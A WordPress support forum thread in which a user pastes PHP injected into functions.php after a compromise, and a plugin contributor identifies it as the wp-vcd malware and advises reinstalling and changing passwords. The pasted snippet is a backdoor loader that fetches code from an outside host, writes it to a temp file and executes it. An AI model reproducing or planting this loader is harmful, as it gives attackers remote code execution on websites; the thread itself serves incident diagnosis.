Hacked Version

  • Resolved fabios83

    (@fabios83)


    8 years, 8 months ago

    Hi everyone,

    when install and active your plugin, my site alert me suspicious file write in wp-includes and functions.php modified.

    for example: wp-includes/class.wp.php

    functions.php add this and other line:

    
if ( ! function_exists( 'theme_temp_setup' ) ) {  
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

if($tmpcontent = @file_get_contents("http://www.spekt.cc/code2.php?i=".$path))
{

function theme_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}

    Please, you can check the security integrity?

    Best regards

Viewing 1 replies (of 1 total)
  • Plugin Contributor Ewout

    (@pomegranate)

    8 years, 8 months ago

    Hello Fabios,
    It looks like your site has been compromised. When this happens, hackers often create code that infect multiple (or all) plugins and often also core WordPress files, so that you will need to reinstall clean versions of all plugins and also WordPress itself. I also recommend checking if there are any unknown admin accounts and change all passwords for your own admin accounts.

    The code thay you posted appears to match with what’s described in this article: https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d

    This code is not coming from the WooCommerce PDF Invoices & Packing Slips plugin. We recently fixed a potential XSS vulnerability (in version 2.0.13), but that was a minor issue that could only be exploited by users that already had full admin access – in which case a lot more damage can be done even without the vulerability. We are not aware of any current vulnerabilities but we always monitor this closely.

    Good luck getting your site back online, I hope this will be resolved quickly!
    Ewout

Viewing 1 replies (of 1 total)

The topic ‘Hacked Version’ is closed to new replies.